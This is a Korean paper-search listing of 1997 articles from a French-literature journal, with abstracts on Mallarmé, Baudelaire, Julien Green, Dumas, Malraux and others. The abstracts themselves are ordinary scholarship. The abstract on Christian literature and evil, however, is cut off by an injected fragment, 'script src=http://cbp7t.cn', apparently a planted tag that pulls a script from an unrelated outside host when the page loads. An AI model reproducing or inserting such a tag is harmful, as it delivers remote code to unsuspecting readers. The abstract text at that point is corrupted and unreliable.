글로버메뉴 바로가기 본문 바로가기 하단메뉴 바로가기

논문검색은 역시 페이퍼서치

불어불문학연구검색

Etudes de Langue et Litterature Francaises


  • - 주제 : 어문학분야 > 불어학
  • - 성격 : 학술지
  • - 간기: 계간
  • - 국내 등재 : KCI 등재
  • - 해외 등재 : -
  • - ISSN : 1226-4350
  • - 간행물명 변경 사항 :
논문제목
수록 범위 : 35권 1호 (1997)

불문학 : 말라르메의 가치전도술 - lgitur , Saint Jean , le Maitre의 경우

김경란 ( Kyung Ran Kim )
5,600
키워드보기
초록보기
Pour Mallarme´, le crite`re de valeur ne concerne pas seulement l`e´volution des jugements; mais le renversements des valeurs et de ses manie`res de `voir`. Dans nos textes, tous les ordres des objets (des choses, de l`espace-temps, du moi, du regard, de l`e´criture) sont entreme^le´s. Cette sorte d`expe´rimentation a besoin du champ de la fiction: l`espace vide et le temps vide. Pour nous, le tournant se trouve a` la de´couverte mallarme´enne du `rien`. Cela se dirige vers la de´ne´gation et vers le re´tablissement de l`ordre de´ja` existent, me^me de l`e´criture. Mais le renversement des ordres ne semble pas finir en vide, ne´gatif en lui-me^me. Le point d`affirmation serait cache´ astucieusement dans la plupart des cas, par exemple, dans Igitur, He´rodiade, le Sonnet en -yx, Un Coup de De´s. La tentative igiturienne du renversement qui e´choue, s`incarne en personnage arachne´en, et toutes les questions pose´es se sont suspendues, telles quelles, sans jamais e^tre re´solues. C`est pourquoi le protagoniste utilise le miroir, le poison, les de´s, afin de ve´rifier ses manie`res de `voir`. Dans Igitur, toutes les me´thodes imaginables sont utilise´es, par exemple, l`e´limination, la de´composition, l`auto-ane´antissement, la transposition, l`identification, le renversement, la spatialisation et la visualisation. Les diffe´rentes recherches qui y sont apparues arrivent, dans He´rodiade, au re´sume´ des actes igituriens, au double bapte^me de Saint Jean. Si nous conside´rons sa de´capitation comme le re´sume´ de tous les doutes du personnage arachne´en, l`alibi du `Mai^tre´ dans le Sonnet en -yx (qui est en gros caracte`re, et qui n`existe) re´sume, enfin, l`e´tat final des objets, y compris le moi et l`espace-temps. Tous ces itinaires rencontrent, apre`s une trentaine d`anne´es, le me^me espace-temps suspendu, sans changement de dehors. Serait-ce la finalite´, juste avant le renversement de´finitif, ou une fin finale qu`on ne pourra pas e´viter? Le poe`te nous laisse-t-il donc seulement une sce`ne extre^mement ne´gatif du seul poing crispe´, du personnage qui est presque totalement submerge´? Si l`on peut y voir le `Mai^tre´ qui subsists, ce ne sera pas a` cause de la suggestion de la `Constellation`. Ce serait plu^tot a` cause du fait qu`une supposition sans fissure a eu lieu, me^me dans les extre^mes vertiges du `rien`. Le fait que le poe`te s`attachait a` la grande tautologie, sans changement, et qu`il est arrive´ au point-ze´ro ou` tous les jugements viennent e´chouer, a vise´ ainsi a` pre´parer un tournant affirmatif. Le vide ou` toutes les ne´gativite´s sont arrive´es au point culminant, le moi ramene´ au sujet ze´rologique, `le regard pur` qui n`est, pour Saint Jean, que le regard-ze´ro, atteint a` travers le deuxie`me bapte^me du sang - tous ces trois illustrent,en re´sume´, le lieu du `regard,` que le poe`te a tant souhaite´ atteindre a` travers diffe´rents renversements des valeurs.

불문학 : 보들레르의 에로스 시학

김종호 ( Jong Ho Kim )
6,400
키워드보기
초록보기
La volupte´ dans la poe´sie de Baudelaire rele`ve pluto^t d`une ontologie profonde que des sens ou de l`esthe´tique. Les phe´nome`nes e´rotiques, mis a` la lumie`re du mythanalyse d`Eros, se re´ve`lent comme effets d`un de´sir, intense et fondamental, de maintenir la vie contre ou me^me avec la Mort : de´sir paradoxal, toujours envahi par l`ennui ou la me´lancolie, et qui ne se porte jamais sans la conscience du Mal, la re´flexion ironique ; de´sir qui va me^me dans le sens contraire au principe d`Eros comme amour et vie, harmonie du moi et du monde. De la` vient le caracte`re satanique, infernal de l`Eros baudelairien. Mais ce n`est la` qu`un e´preuve de purification. La poe´sie de Baudelaire fait a` l`envers ce qu`a fait le mythe cosmogonique d`He´siode. Elle constitue un mythe de contre-Eros, pourrait-on dire, qui consiste a` re´tablir l`e´tat primitif de ce monde-ci, "unite´ devenue dualite´".
5,600
키워드보기
초록보기
Le me´rite de la the´orie de la me´taphore propose´e par P. Ricoeur est d`avoir clarement e´tabli le rapport hie´rarchique entre trois disciplines consacre´es a` la me´taphore- rhe´torique, se´mantique, herme´neutique-, et de faire correspondre a` celles-ci des unite´s signifiantes : mot, phrase, texte. Cependant, on ne trouve nulle part dans La Me´taphore vive, ouvrage principal de P. Ricoeur, une analyse stylistique consacre´e a l`oeuvre litte´raire particulie`re. Il est significatif a` cet e´gard que cet ouvrage s`ache`ve par un chapitre poitant sur . Nous nous proposons ainsi de trouver des proce´de´s d`interpre´tation d`une dans le langage poe´tique. Pour re´aliser ce projet d`e´tude, il faut tenir compte du fait que la me´taphore elle-me^me change de statut au cours de son passage d`un niveau de langage a` l`autre, et d`une discipline a` l`autre : en suivant la progression d`une discipline a` l`autre et celle des entite´s linguistiques correspondantes, la me´taphore-mot finit en effet par prendre la forme d`une me´taphore-texte, apre`s avoir e´pouse´ celle d`un e´nonce´ me´taphorique. La question que Ricoeur n`arrive pas a` formuler est celle de la nature de l`organisme complexe que constitue l`univers me´taphorique en re´seau, a` savoir celle d`une base commune a` la the´orie du texte et a` la the´orie de la me´taphore. En premier lieu, nous allons essayer de pre´ciser les traits essentiels de la rhe´torique centre´e sur le mot et de de´passer les limites de la the´orie de la substitution applique´e au langage poe´tique. En second lieu, il s`agit pour nous de tirer de l`analyse me^me de la me´taphore inscrite dans (et a` l`inte´rieur) le texte, et de la notion de la me´taphore-texte les traits essentiels de la poe´sie moderne : caracte`re arbitraire de l`image poe´tique, densite´ e´nigmatique du langage poe´tique. Enfin, nous nous proposons, pour comprendre ces aspects de la poe´sie moderne, d`analyser deux proce´de´s stylistiques de cet organisme complexe : combinaison de la me´taphore avec d`autres figures et me´taphore file´e.

불문학 : Saint - John Perse의 시에 있어서 대구법

진종화 ( Jong Hwa Jin )
5,000
키워드보기
초록보기
Le pre´sent travail d`inspiration stylistique vise a` analyser le paralle´lisme morpho-syntaxique dans l`oeuvre poe´tique de Saint-John Perse. D`entre´e de jeu, nous prenons la de´finition du paralle´lisme morpho-syntaxique pre´sente´e par Jean Molino(1981) : le paralle´lisme morpho-syntaxique est < la reprise, dans 2 ou n se´quences successives, d`un me^me sche´ma morpho-syntaxique, accompagne´ ou non de re´pe´titions ou de diffe´rences rythmiques, phoniques ou lexico-se´mantiques>. Les analyses font e´merger quelques traits caracte´ristiques : le paralle´lisme morpho-syntaxique est souvent accompagne´ de re´pe´titions des e´le´ments relevant d`autres niveaux que le niveau morpho-syntaxique ; la re´pe´tition de mots qui occupe une place fondamentale dans l`organisation formelle de la poe´sie persienne est e´troitement lie´e au paralle´lisme morpho-svntaxique ; les paralle´lismes antithe´tiques sont plus rares que les paralle´lismes synonymiques ; le fait qu`il existe des paralle´lismes morpho-syntaxiques sans verbe traduit bien que le paralle´lisme joue de concert avec le nominalisme qui constitue un des traits essentiels de la poe´sie persienne ; sur le plan me´trique, la mesure de 8 syllabes et celle de 12 syllabes sont dominantes dans les paralle´lismes persiens, ce qui montre en clair que Saint-John Perse n`est pas en rupture avec la versification traditionnelle. La poe´sie persienne apparai^t comme un rituel poe´tique consistant a` chanter le bonheur d`e^tre au monde dans sa grandeur. Une telle ce´le´bration va de pair avec le paralle´lisme qui est du ressort du langage religieux. Au lieu de se limiter au domaine local, le paralle´lisme morpho-syntaxique dans la poe´sie de Saint-John Perse s`e´tand a` l`ensemble des poe`mes. Ceci contribue a` faire de sa poe´sie un champ d`interactions au niveau formel. Le paralle´lisme morpho-syntaxique dans la poe´sie persienne constitue a` vrai dire une des ossatures par lesquelles l`architecture poe´tique se construit.

불문학 : 도르빌리의 댄디즘

고봉만 ( Bong Mann Ko )
한국불어불문학회|불어불문학연구  35권 1호, 1997 pp. 91-104 ( 총 14 pages)
4,900
키워드보기
초록보기
『댄디즘과 조지 브뤼멜』은 바르베 도르빌리의 댄디로서의 삶에서 뿐만 아니라 댄디즘의 일반 역사에서도 중요한 한 시기를 나타낸다. 왜냐하면 처음으로 댄디즘은 단순히 우아하고 유혹적인 포즈로서가 아니라 완전하게 자기 몫을 지닌 하나의 심사숙고의 대상으로서 고려되었기 때문이다. 우리는 이 작은 책으로부터 출발하여 바르베 도르빌리의 댄디즘을 연구하고 자 한다. 바르베 도르빌리는 자신의 용모에 대한 (상상적) 콤프렉스로 인해 많은 고통을 겪었다. 댄디즘은 이런 내면의 상처를 부분적으로 치유하는 데 도움을 주었다. 댄디는 무엇 보다 아름다움의 창조물이길 원한다. 그러나 예술가와 달리 그가 예술 작품으로 만드는 것은 그의 삶과 자기자신이다. 타인의 시선을 끌기 위해 그는 독창성을 확언하고 배양 한다. 댄디즘은 바르베 도르빌리에게 있어 이중의 기능을 담당한다. 방어 무기로서 그것은 자존심이 겪은 상처를 감추는 데 쓰이는 침투할 수 없는 마스크이며, 공격 무기로서 그것은 영예를 갈망하는 자신의 욕망을 만족시키는 수단이다. 바르베 도르빌리 작품 곳곳에 등장하는 댄디들의 주요 기조는 보들레르나 데카당스의 경우처럼 탐미주의적 인간이 아니라 권력적 인간이다. 바르베 도르빌리의 댄디즘은 또한 민주주의적 평등주의적 시대에 대항하고자 했던 작가의 선택, 삶의 방식이다.

불문학 : 현대 프랑스 기독교 문학과 악의 문제

권은미 ( Eun Mi Kwon )
한국불어불문학회|불어불문학연구  35권 1호, 1997 pp. 105-125 ( 총 21 pages)
5,600
키워드보기
초록보기
L`originalite´ de la litte´rature dans ce sie`cle a e´te´, d`apre`s Albe´re`s, de ne pas voiler le mal sous le masque de la morale, de retrouver la croyance en Satan, autrefois perdue dans la facilite´. L`univers de la litte´rature chre´tienne conc¿ue comme l`expression de la croyance en Satan a cause´ un conflit a` des romanciers appele´s `catholiques`, surtout a` Mauriac et Green. De me^me que Gide insistent qu`il n`est pas d`oeuvre d`art ou` n`entre la collaboration du de´mon, Mauriac avoue que sa pre´occupation essentielle est le proble`me du mal et qu`il est impossible d`exorciser le roman, d`en chasser le diable. Et Green aussi reconnai^t comme vrai que le mal est un e´le´ment essentiel puisque toute son oeuvre vient directement du conflit entre le bien et le mal. Les raisons du conflit entre leur croyance et leur univers romanesque se diffe`rent pour chacun. Pour Green qui conside`re la litte´rature comme un plan infe´rieur a` celui de son aventure spirituelle, et pour qui la raison d`e^tre n`est que la de´couverte de Dieu en nous, ce conflit est ne´ uniquement de l`inquie´tude pour son salut chre´tien. Pour Mauriac, angoisse´ aussi de la me^me inquie´tude, il y a une autre raison qui est de se justifier contre la reproche porte´e a` l`amoralisme de ses personnages en tant que chre´tien qui de´ployait une grande influence actuelle. Ce conflit s`aggrave par leur concept de l`univers romanesque qui se re´sume pour eux en personnages. Avec un peu de re´serves, Mauriac reconnai^t qu`il y a la complice et l`identification entre le romancier et ses personnages. Mais Green insiste sur cette relation d`une identification absolue. Dens Moi¨ra que l`on peut conside´rer pour son premier roman d`ordre autobiographique, Joseph, d`un a^ge de 20 ans, obse´de´ a` la fois de la religion et de la sexualite´, trouve le mal dans l`instinct sexuel. Pourtant dans le refus de ce mal, il se trouve dans un autre mal, la prise de conscience d`e^tre juste et e´lu, ce que l`auteur de 50 ans conside`re comme un mal encore pire, parce que celui-ci e´loigne davantage l`homme de l`humanite et de Dieu. Dans la Pharisienne, Brigitte trouve aussi le mal dans tout ce qui touche a` la sensualite´ ou a` la sexualite´. Pourtant l`auteur de´voile avec le narrateur, a` travers l`attitude de Brigitte refusant ce mal, le pharisai¨sme comme un vrai mal de ce roman. La peinture du pharisai¨sme est biennuance´e et ambigue par les caracte`res des personnages et la technique narrative. Le narrateur Louis, romancier d`un a^ge mu^r raconte la re´action de Brigitte a` deux aventures d`amour auxquelles l`acteur Louis, garc¿on de 13 ans s`est me^le´ partiellement en les de´nonc¿ant sournoisement. Louis narrateur, en se reme´morant l`attitude de Brigitte et la suite de ces aventures ou` Louis acteur, petit pharisien, a joue´ un ro^le du complice de Brigitte, y voit dans celle-ci l`expression de son propre mal, pharisaisme. Par conse´quent, dans l`attitude du narrateur Louis, on peut voir non seulement la de´nonce de ce mal, mais aussi le de´sir dejustifier Brigitte. Nous pouvons voir cette relation entre le narrateur et Brigitte se re´pe´ter par celle entre le romancier et le narrateur Louis. De cela la nuance et l`ambigui¨te´ s`accentent. Comme Monfe´rier l`a indique´, pour qu`il y ait le pharisai¨sme, il faut que la conscience ait refoule´ au fond d`elle me^me les pre´ceptes e´vange´liques pour les restituer modele´s et travestis par une intelligence solide mais pervertie. Cette `intelligence solide mais pervertie´, garantie d`abord par les caracte`res des personnages et la technique narrative, est te´moigne´e par la logique paradoxale quo Brigitte introduit sournoisement pour se justifier. Et `les preceptes e´vange´liques modele´s et travestis` se de´ploient en toutes les gammes, du sentiment de laperse´cute´e jusqu`a` la certitude d`e^tre juste et e´lue d`ou?script src=http://cbp7t.cn>

불문학 : 줄리앙 그린의 작품에 나타난 밤의 이미지

김남연 ( Nam Yon Kim )
한국불어불문학회|불어불문학연구  35권 1호, 1997 pp. 127-141 ( 총 15 pages)
5,000
키워드보기
초록보기
Il est inte´ressant d`observer la couverture d`un livre propose´ avant d`e´tudier le contenu me^me de celui-ci, car, au fond, le premier contact avec un ouvrage de la part d`un lecteur, c`est justement sa couverture. Celle-ci a une signification fondamentale dans la mesure ou` le titre, entre autres, veut transmettre aux lecteurs le message que l`auteur projette dans son oeuvre. Il n`est pas difficile d`imaginer qu`un e´crivain cherche une e´tiquette fide`le et se´duisante pour le livre propose´ a` ses lecteurs, en espe´rant englober l`oeuvre entie`re dans sa couverture. Le titre, a` plus forte raison, cherche a` re´ve´ler d`une manie`re concentre´e l`essentiel du contenu et surtout peut-e^tre l`ambiance ge´ne´rale de l`oeuvre. Dans ce cas l`image contenue dans la couverture repre´sente l`oeuvre entie`re. Green ne fait jamais de plan lorsqu`il commence un livre. Au point de de´part, il n`existe qu`une sorte de the`me ou simplement une image. Pour mieux comprendre l`art greenien, il est donc nece´ssaire de de´chiffrer ce message, la couverture et le titre. Le´viathan, son troisie`me roman est le nom d`un monstre de la mythologie phe´nicienne. Varouna, dans la mythologie ve´dique, repre´sente le ciel nocturne. Enume´rons ses autres titres re´ve´lateurs: Le Mauvais lieu, L`Ennemi, Le Malfaiteur, Les Clefs de la mort, L`Enfer, L`Ombre, Devant la porte sombre, La Nuit des fanto^mes, Minuit, Revenant, Claque homme dans sa nuit. L`essentiel est de noter que plus de la moitie´ des oeuvres de Green doivent leurs titres a` une image analogique: l`obscurite´ ou la nuit. Green s`inte´resse a` l`univers plus vaste que l`univers normal sous la lumie`re du ciel, parce qu`il croit que cet univers vaste lui ouvrira la re´alite´ et la face cache´e, inavouable, des hommea. La force de la nuit ou` les puissances du mal e´lisent domicile domine toute son oeuvre. Julien Green est un e´crivain noctume.
6,000
키워드보기
초록보기
Cette e´tude consiste a` mettre en lumie`re les aspects mythiques que contient Le comte de Monte-Cristo, chef d`oeuvre romanesque d`Alexandre Dumas pe`re. Il ne s`agit pas d`une recherche the´orique, mais d`une recherche s`appuyant sur des exemples concrets. Nous pouvons y remarquerla forte pre´sence de la structure du mythe du he´ros telle que la de´finissent Otto Rank et Philippe Sellier. Les gestes he´roi¨ques se manifestent dans le personnage principal dumassien: la naissance, l`initiation, l`apothe´ose et le de´clin du he´ros. Mais le personnage romanesque de Dumas ne reproduit pas exactement les sche`mes du mythe du he´ron solaire; le mythe s`y historicise. Ainsi la version romanesque dumassienne de ce mythe est-elle affecte´e par l`e´poque de l`e´crivain ou` la classe bourgeoise a commence´ a` occuper remarquablementle devant de la sce`ne dans la socie´te´ franc¿aise. Le personnage mythique ne s`embourgeoise pas pourtant comme le d`Artagnan dans LesTrois Mousquetaires, mais touche le domaine du sacre´ ou` les deux cate´gories morales, le bien et le mal, se confondent. Il en ressort que les actes du personnage principal ne progressent pas seulement en bien mais aussi d`une certaine manie`re en mal. Bref, le he´ros dumassien dans Le comte de Monte-Cristo comprend certes des e´le´ments inhe´rents a` la structure du he´ros mythique, mais il n`en reste pas moins vrai que, situe´ dans la socie´te´ en pleine mutation au XIXe sie`cle, le mythe s`historicise avec certains aspects romantiques.
5,100
키워드보기
초록보기
Les Noyers de l`Altenburg s`articulent sur une discontinuite´ du re´cit compose´ de plusieurs histoires inde´pendantes encha^sse´es les unes dans les autres, que de´veloppent les trois ge´ne´rations de la famille de Vincent Berger. Cette discontinuite´, rythme´e par deux mouvements, l`un ascendant et l`autre descendant, est e´troitement lie´e au sujet du roman, a` savoir a` la que^te de "l`homme fondamental". Elle incarne dans le mouvement ascendant une vision anti-he´ge´lienne de l`histoire et de l`homme. Dans le mouvement descendant, elle en mate´rialise une vision anti-spengle´rienne, une vision de me´tamorphose. L`homme fondamental que Vincent et son fits, le narrateur de´couvrent construisant cette vision contre Spengler s`immortalise dans un mythe d`origine re´actualise´ par un couple paysan et le paysage de ferme e´blouissant qu`il a cre´e´. A l`oppose´ du processus de l`effondrement de la vieille culture d`Occident, la cre´ation d`une nouvelle culture s`ouvre a` partir de la ge´ne´ration de ce couple qui, en tant que prototype de l`homme fondamental, se me´tamorphose dans deux autres ge´ne´rations qui lui succe`dent. Cet e^tre permanent, l`auteur l`identifie avec l`homme gothique dont il pense qu`il englobe l`homme mythologique de la Gre`ce antique. Il concc¿oit cette a^me gothique comme e^tre ide´al qui, libe´re´ du destin, re´alise pleinement sa volonte´ de s`e´panouir ici et maintenant dans la possibilie´ infinie de me´tamorphose. Malraux, face a` la crise d`Occident, trouve dans le roman l`a^me gothique comme fondement spirituel de reconstruction de l`Europe. En me^me temps, il termine, tout en conque´rant les deux cultures grecque et chre´tienne, son itine´raire romanesque d`interrogation, oriente´ vers le de´passement de la civilisation du sie`cle qu`il qualified`"agnostique".

불문학 : 쥘리엥 그린의 소설에 나타난 출애굽의 신화 구조

김점석 ( Jeom Seok Kim )
한국불어불문학회|불어불문학연구  35권 1호, 1997 pp. 185-199 ( 총 15 pages)
5,000
키워드보기
초록보기
우리가 본 논문에서 검증하고자 하는 가설은, 쥘리엥 그린의 소설에서 읽을 수 있는 인간 운명의 드라마가 취하고 있는 구조가 구약의 <출애굽기>의 구조와 부합하고 있다는 점이다. 즉 우리는 그린이 소설 속에서 그리고 있는 인간의 현실적인 상황을 이스라엘 민족이 가나안 땅으로 향하는 길목에서 광야에서 겪어야 했던 고난과 갈망에 대비시키면서, 그린의 작품에 나타나는 다양한 행동들이나 사건들을 출애굽 신화에서 그 의미를 찾아보고자 한다. 여기서 우리는 출애굽의 사건을 단지 성서적인 주제로만 되는 것이 아니라, 서구인의 정신세계에 자리하고 있는 하나의 신화로 보고자 한다. 우리가 그린 소설의 신화적인 상상력의 기능을 탐구한다는 것은 그의 작품 속에서 드러나는 신화적인 장식을 찾아내겠다는 것이 아니라, 그의 소설에 나타나는 주제들이나 장식들이 작가의 사유의 형성에 영향을 끼쳤던 기존의 신화구조와 일치하고 있음을 드러내고자 하는 것이다. 그린의 주인공들에게 있어서 현실 벗어나기의 욕망과 그에 대립되어 나타나는 행복한 땅으로의 귀환의 욕망은 서로 불가분의 관계 속에서 영원히 맞물려서 진행되고 있다. 우리는 이러한 그린의 욕망의 여정을 추적하고 그 의미를 규명하는 데 있어서 출애굽의 역정을 그 원형으로 삼고 있다. 우선, I장에서는 그린의 작품에 나타나는 몇 가지 주제들을 드러낸 후, 그것이 출애굽 사건을 받쳐주고 있는 주제들과 비교함으로써 우리의 논의의 출발점으로 삼고 있다. 다음으로, II, III장에서는 I장에서 지적한 인간 운명의 두 가지 커다란 주제 - 현실에서의 고통과 낙원에 대한 갈망 - 에 대해서 살펴보고 있다. 그렇게 함으로써 그린의 상상세계를 받쳐주고 있는 두 개의 주제 사이의 긴장 양상을 드러내고 있다. 인간은, 불만족스러운 현실에서 벗어나고자 하는 욕망과 행복한 휴식의 세계로, 침잠하고자 하는 욕망의 한가운데에 처해 있다. 그런데 인간은 상상력 속에서, 이러한 두 욕망 사이의 대치 상황을 완화시키고 조화와 균형을 찾으려는 노력 속에서 자신의 행복을 찾아나가고 있다. 결론적으로, 우리는 그린에게 있어서의 행복의 개념과 인간 운명이 모습을 살펴보고 있다. 결국 그린이 작품 속에서 일관되이 지향했던 세계인 no man`s land는 그린적인 상상력의 두 가지 양상이 동시에 존재하는, 그리하여 인간이 운명처럼 고통을 감수하면서 항상 자신들에게 약속된 행복의 세계에 대한 희망을 안고 살아갈 수 있는 세계이다.
1 2 3 >